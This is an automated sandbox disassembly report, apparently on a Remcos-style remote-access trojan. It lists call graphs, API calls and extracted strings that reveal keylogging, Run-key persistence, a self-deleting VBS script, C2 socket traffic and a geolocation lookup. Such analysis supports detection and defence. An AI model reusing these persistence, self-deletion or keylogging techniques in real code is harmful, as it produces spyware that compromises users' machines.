                                                                                                control_flow_graph 993 40bf04-40bf1a call 411699 996 40bf26-40bf2f 993->996 997 40bf1c-40bf21 call 40afba 993->997 999 40bf31 call 418c08 996->999 1000 40bf36-40bf3d 996->1000 997->996 999->1000 1002 40bf50-40bf60 1000->1002 1003 40bf3f-40bf4b call 401e07 call 41b42f 1000->1003 1005 40bf62-40bf71 call 401e07 call 41297a 1002->1005 1006 40bf77-40bf82 1002->1006 1003->1002 1020 40bf76 1005->1020 1007 40bf84-40bf90 call 401e07 call 41297a 1006->1007 1008 40bf96-40bf9c 1006->1008 1025 40bf95 1007->1025 1012 40bfb3-40c007 call 436050 call 4022f8 call 401e8f * 2 call 41265d 1008->1012 1013 40bf9e-40bfb2 call 401e07 call 41297a 1008->1013 1035 40c019-40c047 call 401e8f RegDeleteKeyA call 406a1a 1012->1035 1036 40c009-40c013 GetModuleFileNameW 1012->1036 1013->1012 1020->1006 1025->1008 1041 40c058-40c11d SetFileAttributesW call 41ab38 call 41ae08 call 4028cf call 401e13 call 401eea call 43ac0f call 403b40 call 4028cf call 403cdc call 401e13 * 2 call 403b40 call 403cbb call 401e13 1035->1041 1042 40c049-40c056 call 401e07 SetFileAttributesW 1035->1042 1036->1035 1073 40c176-40c1d0 call 403b40 call 4028cf * 2 call 402de3 call 401e13 * 3 1041->1073 1074 40c11f-40c171 call 403b40 call 403cbb call 4028cf call 402de3 call 401e13 * 3 1041->1074 1042->1041 1102 40c1e0-40c1f0 call 406a1a 1073->1102 1103 40c1d2-40c1db call 4082d2 1073->1103 1074->1073 1107 40c1f2-40c22a call 40b0dd call 4028cf call 402de3 call 401e13 * 2 1102->1107 1108 40c22f-40c26b call 4082d2 call 401e07 call 4022f8 call 401e07 call 41b58f 1102->1108 1103->1102 1107->1108 1128 40c286-40c287 ExitProcess 1108->1128 1129 40c26d-40c280 call 401e07 ShellExecuteW 1108->1129 1129->1128
                                                                                                APIs
                                                                                                  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
                                                                                                  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
                                                                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
                                                                                                • RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
                                                                                                • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
                                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,74DF3530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
                                                                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
                                                                                                • ExitProcess.KERNEL32 ref: 0040C287
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
                                                                                                • String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
                                                                                                • API String ID: 3797177996-1998216422
                                                                                                • Opcode ID: 2dc6bcc30e7d91a4770785caf6a30b96f2a8f13afe6c018fb0bd79822a2bffc2
                                                                                                • Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
                                                                                                • Opcode Fuzzy Hash: 2dc6bcc30e7d91a4770785caf6a30b96f2a8f13afe6c018fb0bd79822a2bffc2
                                                                                                • Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • Sleep.KERNEL32(00001388), ref: 00409E62
                                                                                                  • Part of subcall function 00409D97: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00409E6F), ref: 00409DCD
                                                                                                  • Part of subcall function 00409D97: GetFileSize.KERNEL32(00000000,00000000,?,?,?,00409E6F), ref: 00409DDC
                                                                                                  • Part of subcall function 00409D97: Sleep.KERNEL32(00002710,?,?,?,00409E6F), ref: 00409E09
                                                                                                  • Part of subcall function 00409D97: CloseHandle.KERNEL32(00000000,?,?,?,00409E6F), ref: 00409E10
                                                                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00409E9E
                                                                                                • GetFileAttributesW.KERNEL32(00000000), ref: 00409EAF
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00409EC6
                                                                                                • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 00409F40
                                                                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,00465900,?,00000000,00000000,00000000,00000000,00000000), ref: 0040A049
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                                                                                • String ID: @CG$@CG$XCG$XCG$xAG$xAG
                                                                                                • API String ID: 3795512280-3163867910
                                                                                                • Opcode ID: 3d513030585ca1f0b7a1cebd0501873cfe1ee9b5c501f3c741bf3b4b21dc813c
                                                                                                • Instruction ID: b7dfc09a395f5416f32c5fe597dbb364f69b6ed32616efff49b152d1c9b912f4
                                                                                                • Opcode Fuzzy Hash: 3d513030585ca1f0b7a1cebd0501873cfe1ee9b5c501f3c741bf3b4b21dc813c
                                                                                                • Instruction Fuzzy Hash: 30518D716043005ACB05BB72D866ABF769AAFD1309F00053FF886B71E2DF3D9D44869A

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1230 40428c-4042ad connect 1231 4043e1-4043e5 1230->1231 1232 4042b3-4042b6 1230->1232 1235 4043e7-4043f5 WSAGetLastError 1231->1235 1236 40445f 1231->1236 1233 4043da-4043dc 1232->1233 1234 4042bc-4042bf 1232->1234 1237 404461-404465 1233->1237 1238 4042c1-4042e8 call 404cbf call 401f66 call 41a686 1234->1238 1239 4042eb-4042f5 call 420151 1234->1239 1235->1236 1240 4043f7-4043fa 1235->1240 1236->1237 1238->1239 1252 404306-404313 call 420373 1239->1252 1253 4042f7-404301 1239->1253 1242 404439-40443e 1240->1242 1243 4043fc-404437 call 41bc76 call 404c9e call 401f66 call 41a686 call 401eea 1240->1243 1245 404443-40445c call 401f66 * 2 call 41a686 1242->1245 1243->1236 1245->1236 1265 404315-404338 call 401f66 * 2 call 41a686 1252->1265 1266 40434c-404357 call 420f34 1252->1266 1253->1245 1292 40433b-404347 call 420191 1265->1292 1277 404389-404396 call 4202ea 1266->1277 1278 404359-404387 call 401f66 * 2 call 41a686 call 420592 1266->1278 1288 404398-4043bb call 401f66 * 2 call 41a686 1277->1288 1289 4043be-4043d7 CreateEventW * 2 1277->1289 1278->1292 1288->1289 1289->1233 1292->1236
                                                                                                APIs
                                                                                                • connect.WS2_32(?,?,?), ref: 004042A5
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043CB
                                                                                                • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,0040192B), ref: 004043D5
                                                                                                • WSAGetLastError.WS2_32(?,?,?,0040192B), ref: 004043E7
                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateEvent$ErrorLastLocalTimeconnect
                                                                                                • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
                                                                                                • API String ID: 994465650-2151626615
                                                                                                • Opcode ID: 038be6f33a456a912a7141f7e6ebadd8fcb208e6641f70431febe428b3a5382d
                                                                                                • Instruction ID: b196b808fbc66b1ac8da6b4b51d7f626a0d3d22bc4cde50e21f83cd2c7739b74
                                                                                                • Opcode Fuzzy Hash: 038be6f33a456a912a7141f7e6ebadd8fcb208e6641f70431febe428b3a5382d
                                                                                                • Instruction Fuzzy Hash: ED4128B1B00202A7CB04B77A8C5B66D7A55AB81368B40007FF901676D3EE7DAD6087DF

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                • __Init_thread_footer.LIBCMT ref: 0040A456
                                                                                                • Sleep.KERNEL32(000001F4), ref: 0040A461
                                                                                                • GetForegroundWindow.USER32 ref: 0040A467
                                                                                                • GetWindowTextLengthW.USER32(00000000), ref: 0040A470
                                                                                                • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040A4A4
                                                                                                • Sleep.KERNEL32(000003E8), ref: 0040A574
                                                                                                  • Part of subcall function 00409D58: SetEvent.KERNEL32(?,?,?,0040AF3F,?,?,?,?,?,00000000), ref: 00409D84
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
                                                                                                • String ID: [${ User has been idle for $ minutes }$]
                                                                                                • API String ID: 911427763-3954389425
                                                                                                • Opcode ID: 9487376d067a584a435570b7c8b001f1ddb8e28b6fa1212fc905e468af575a11
                                                                                                • Instruction ID: 0ecdfa35f4bf358d0b6072dbfc0ad8fc4f94b2a12b5a089c7f39fa9b67fb4d59
                                                                                                • Opcode Fuzzy Hash: 9487376d067a584a435570b7c8b001f1ddb8e28b6fa1212fc905e468af575a11
                                                                                                • Instruction Fuzzy Hash: C451DF316083005BC614FB21D84AAAE7794BF84318F50493FF846A62E2EF7C9E55C69F

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1385 40c89e-40c8c3 call 401e52 1388 40c8c9 1385->1388 1389 40c9ed-40ca13 call 401e07 GetLongPathNameW call 403b40 1385->1389 1390 40c8d0-40c8d5 1388->1390 1391 40c9c2-40c9c7 1388->1391 1392 40c905-40c90a 1388->1392 1393 40c9d8 1388->1393 1394 40c9c9-40c9ce call 43ac0f 1388->1394 1395 40c8da-40c8e8 call 41a74b call 401e18 1388->1395 1396 40c8fb-40c900 1388->1396 1397 40c9bb-40c9c0 1388->1397 1398 40c90f-40c916 call 41b15b 1388->1398 1413 40ca18-40ca85 call 403b40 call 40cc37 call 402860 * 2 call 401e13 * 5 1389->1413 1401 40c9dd-40c9e2 call 43ac0f 1390->1401 1391->1401 1392->1401 1393->1401 1405 40c9d3-40c9d6 1394->1405 1417 40c8ed 1395->1417 1396->1401 1397->1401 1414 40c918-40c968 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1398->1414 1415 40c96a-40c9b6 call 403b40 call 43ac0f call 403b40 call 402860 call 401e18 call 401e13 * 2 1398->1415 1410 40c9e3-40c9e8 call 4082d7 1401->1410 1405->1393 1405->1410 1410->1389 1423 40c8f1-40c8f6 call 401e13 1414->1423 1415->1417 1417->1423 1423->1389
                                                                                                APIs
                                                                                                • GetLongPathNameW.KERNEL32(00000000,?,00000208), ref: 0040CA04
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LongNamePath
                                                                                                • String ID: AppData$ProgramData$ProgramFiles$SystemDrive$Temp$UserProfile$WinDir$\SysWOW64$\system32
                                                                                                • API String ID: 82841172-425784914
                                                                                                • Opcode ID: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                • Instruction ID: 51cedb133b73bca78a9fc1065318242b3d6e678e936cb09da4a185c9a299c852
                                                                                                • Opcode Fuzzy Hash: 32c7dd7da07534816f75e312af4f9c722b84838e0212387709dec4be18cb4e42
                                                                                                • Instruction Fuzzy Hash: 39413A721442009BC214FB21DD96DAFB7A4AE90759F10063FB546720E2EE7CAA49C69F

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1615 41a51b-41a55a call 401faa call 43a88c InternetOpenW InternetOpenUrlW 1620 41a55c-41a57d InternetReadFile 1615->1620 1621 41a5a3-41a5a6 1620->1621 1622 41a57f-41a59f call 401f86 call 402f08 call 401eea 1620->1622 1623 41a5a8-41a5aa 1621->1623 1624 41a5ac-41a5b9 InternetCloseHandle * 2 call 43a887 1621->1624 1622->1621 1623->1620 1623->1624 1628 41a5be-41a5c8 1624->1628
                                                                                                APIs
                                                                                                • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0041A53E
                                                                                                • InternetOpenUrlW.WININET(00000000,http://geoplugin.net/json.gp,00000000,00000000,80000000,00000000), ref: 0041A554
                                                                                                • InternetReadFile.WININET(00000000,00000000,0000FFFF,00000000), ref: 0041A56D
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B3
                                                                                                • InternetCloseHandle.WININET(00000000), ref: 0041A5B6
                                                                                                Strings
                                                                                                • http://geoplugin.net/json.gp, xrefs: 0041A54E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Internet$CloseHandleOpen$FileRead
                                                                                                • String ID: http://geoplugin.net/json.gp
                                                                                                • API String ID: 3121278467-91888290
                                                                                                • Opcode ID: bc33eb6b94fe27f6a6150d03e83e24c652b8e94ed64a6a2357a004aa9bac096d
                                                                                                • Instruction ID: 402fbdb1aff19a1981f8347c65821a4f206ec005c70a85ea4635686413b1fe25
                                                                                                • Opcode Fuzzy Hash: bc33eb6b94fe27f6a6150d03e83e24c652b8e94ed64a6a2357a004aa9bac096d
                                                                                                • Instruction Fuzzy Hash: 2711C87110A3126BD214AA169C45DBF7FDCEF46365F00053EF905D2191DB689C48C6B6

                                                                                                Control-flow Graph

                                                                                                APIs
                                                                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                                                                  • Part of subcall function 00412513: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00412537
                                                                                                  • Part of subcall function 00412513: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,00000400), ref: 00412554
                                                                                                  • Part of subcall function 00412513: RegCloseKey.KERNEL32(?), ref: 0041255F
                                                                                                • StrToIntA.SHLWAPI(00000000,0046BC48,?,00000000,00000000,00474358,00000003,Exe,00000000,0000000E,00000000,0046556C,00000003,00000000), ref: 0041A4D9
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCurrentOpenProcessQueryValue
                                                                                                • String ID: (32 bit)$ (64 bit)$CurrentBuildNumber$ProductName$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                                • API String ID: 1866151309-2070987746
                                                                                                • Opcode ID: af6938fd0642fd6960adb4339b8e44af404292a25ca7c0158ca9239a1ea53c7d
                                                                                                • Instruction ID: 19977b185b3bcff34fa520d2ecc4782d624f476aadfe6515b429a208ce335d2f
                                                                                                • Opcode Fuzzy Hash: af6938fd0642fd6960adb4339b8e44af404292a25ca7c0158ca9239a1ea53c7d
                                                                                                • Instruction Fuzzy Hash: EF11E9A060020166C704B365DCABDBF765ADB90304F50443FB906E31D2EB6C9E9683EE

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 1657 4126d2-4126e9 RegCreateKeyA 1658 412722 1657->1658 1659 4126eb-412720 call 4022f8 call 401e8f RegSetValueExA RegCloseKey 1657->1659 1661 412724-412730 call 401eea 1658->1661 1659->1661
                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 004126E1
                                                                                                • RegSetValueExA.KERNEL32(?,HgF,00000000,?,00000000,00000000,004742F8,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412709
                                                                                                • RegCloseKey.KERNEL32(?,?,?,0040E5FB,00466748,5.3.0 Pro), ref: 00412714
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: HgF$pth_unenc
                                                                                                • API String ID: 1818849710-3662775637
                                                                                                • Opcode ID: 765c5b57a6dff30667eef5ece221311e43a2419d6aa6c2777a289da3ea8508e9
                                                                                                • Instruction ID: d7c223529d0a909ac1d5b5cf1be9cbd74eb10d05c00374dbcf2eb8abb0eb8976
                                                                                                • Opcode Fuzzy Hash: 765c5b57a6dff30667eef5ece221311e43a2419d6aa6c2777a289da3ea8508e9
                                                                                                • Instruction Fuzzy Hash: 98F09032040104FBCB019FA0ED55EEF37ACEF04751F108139FD06A61A1EA75DE04EA94
                                                                                                APIs
                                                                                                • send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                                                                • WaitForSingleObject.KERNEL32(?,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                • SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: EventObjectSingleWaitsend
                                                                                                • String ID: LAL
                                                                                                • API String ID: 3963590051-3302426157
                                                                                                • Opcode ID: f152f079d860f25f234b0e641467767b8f062a6183c919acee6354ec023c117f
                                                                                                • Instruction ID: 68c7e6670e460543dd9c105572fcb78fed3a06f13f8c8b410ea91b680b50408d
                                                                                                • Opcode Fuzzy Hash: f152f079d860f25f234b0e641467767b8f062a6183c919acee6354ec023c117f
                                                                                                • Instruction Fuzzy Hash: 192143B29001196BDF04BBA5DC96DEE777CFF54358B00013EF916B21E1EA78A604D6A4
                                                                                                APIs
                                                                                                • CreateThread.KERNEL32(00000000,00000000,004099A9,?,00000000,00000000), ref: 0040992A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_00009993,?,00000000,00000000), ref: 0040993A
                                                                                                • CreateThread.KERNEL32(00000000,00000000,Function_000099B5,?,00000000,00000000), ref: 00409946
                                                                                                  • Part of subcall function 0040A876: GetLocalTime.KERNEL32(?,?,00000000), ref: 0040A884
                                                                                                  • Part of subcall function 0040A876: wsprintfW.USER32 ref: 0040A905
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CreateThread$LocalTimewsprintf
                                                                                                • String ID: Offline Keylogger Started
                                                                                                • API String ID: 465354869-4114347211
                                                                                                • Opcode ID: 7d563e3858a09df2f4bd7d6711c02a31a8398f24dadcc71a9cfb334c9013e64b
                                                                                                • Instruction ID: 73cd13916ef890eca76c0e29a3751801184202c96e3ca0ae9416a03768ca9078
                                                                                                • Opcode Fuzzy Hash: 7d563e3858a09df2f4bd7d6711c02a31a8398f24dadcc71a9cfb334c9013e64b
                                                                                                • Instruction Fuzzy Hash: CF11ABB15003097AD220BA36DC87CBF765CDA813A8B40053EF845225D3EA785E54C6FB
                                                                                                APIs
                                                                                                • RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                • RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseCreateValue
                                                                                                • String ID: TUF
                                                                                                • API String ID: 1818849710-3431404234
                                                                                                • Opcode ID: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                • Instruction ID: 4d8f19d4f5fba69279ea975c705bdc3302fb28fe13ea63ccb444db4f968143a5
                                                                                                • Opcode Fuzzy Hash: 386e33d00f3fb5cef405d4ff1ae12e7e359dce24562d3d83ccac8fce873b9f24
                                                                                                • Instruction Fuzzy Hash: 8DE03071540204BFEF115B909C05FDB3BA8EB05B95F004161FA05F6191D271CE14D7A4
                                                                                                APIs
                                                                                                • TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
                                                                                                • UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
                                                                                                • TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: TerminateThread$HookUnhookWindows
                                                                                                • String ID: pth_unenc
                                                                                                • API String ID: 3123878439-4028850238
                                                                                                • Opcode ID: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                • Instruction ID: c35477c7b81069fed5c639b3d306817a7c517f63bcb5e1090982200d4e51bed9
                                                                                                • Opcode Fuzzy Hash: 46dff24612c1799e978f47a7720dcdfa0824c6f48cf00f8dbc5bb460590095c7
                                                                                                • Instruction Fuzzy Hash: 32E01DB1209317DFD3101F546C84825B799EB44356324047FF6C155252C5798C54C759
                                                                                                APIs
                                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,00000000,?,00000000,?,?,000000FF,00000000,?,?), ref: 00404778
                                                                                                • CreateThread.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0040478C
                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000), ref: 00404797
                                                                                                • CloseHandle.KERNEL32(?,?,00000000), ref: 004047A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                                                                                • String ID:
                                                                                                • API String ID: 3360349984-0
                                                                                                • Opcode ID: 0fe16b6651eafcc54e03b4dec98785a360e0800c2299c91ef6750890a33817fb
                                                                                                • Instruction ID: f4983b6e647f91c6eb1a16b69ab68a2f9d5597509a23169db7b615edd0c6cdea
                                                                                                • Opcode Fuzzy Hash: 0fe16b6651eafcc54e03b4dec98785a360e0800c2299c91ef6750890a33817fb
                                                                                                • Instruction Fuzzy Hash: 34417171508301ABC700FB61CC55D7FB7E9AFD5315F00093EF892A32E2EA389909866A
                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: SystemTimes$Sleep__aulldiv
                                                                                                • String ID:
                                                                                                • API String ID: 188215759-0
                                                                                                • Opcode ID: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                • Instruction ID: 3b66203fd79088dfadce72ddbf0b0401c54eb4bd27628439374ba0e7aa9136f0
                                                                                                • Opcode Fuzzy Hash: 92a2626712ce3f1da2ce83f7d896a05a413d351f08ea1f1dcdc4cf9aeb41d840
                                                                                                • Instruction Fuzzy Hash: 9D215E725083009BC304DF65D98589FB7E8EFC8654F044A2EF589D3251EA34EA49CB63
                                                                                                APIs
                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                • CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CloseCreateHandlePointerWrite
                                                                                                • String ID:
                                                                                                • API String ID: 3604237281-0
                                                                                                • Opcode ID: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                • Instruction ID: 083799f3d1f95ebfb1fb2bbe8bc155d348f6fb5eb74ded268dd94cd43ec1eb57
                                                                                                • Opcode Fuzzy Hash: cba3a97e1e2bda49592f8a8e1d6d35a5d6160c6c563f13c2ae5fe5c742252b28
                                                                                                • Instruction Fuzzy Hash: 7501F5712092157FE6104F28AC89EBB739EEB86379F10063AF552C22C0D725CD8586BE
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.2251604763.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CountEventTick
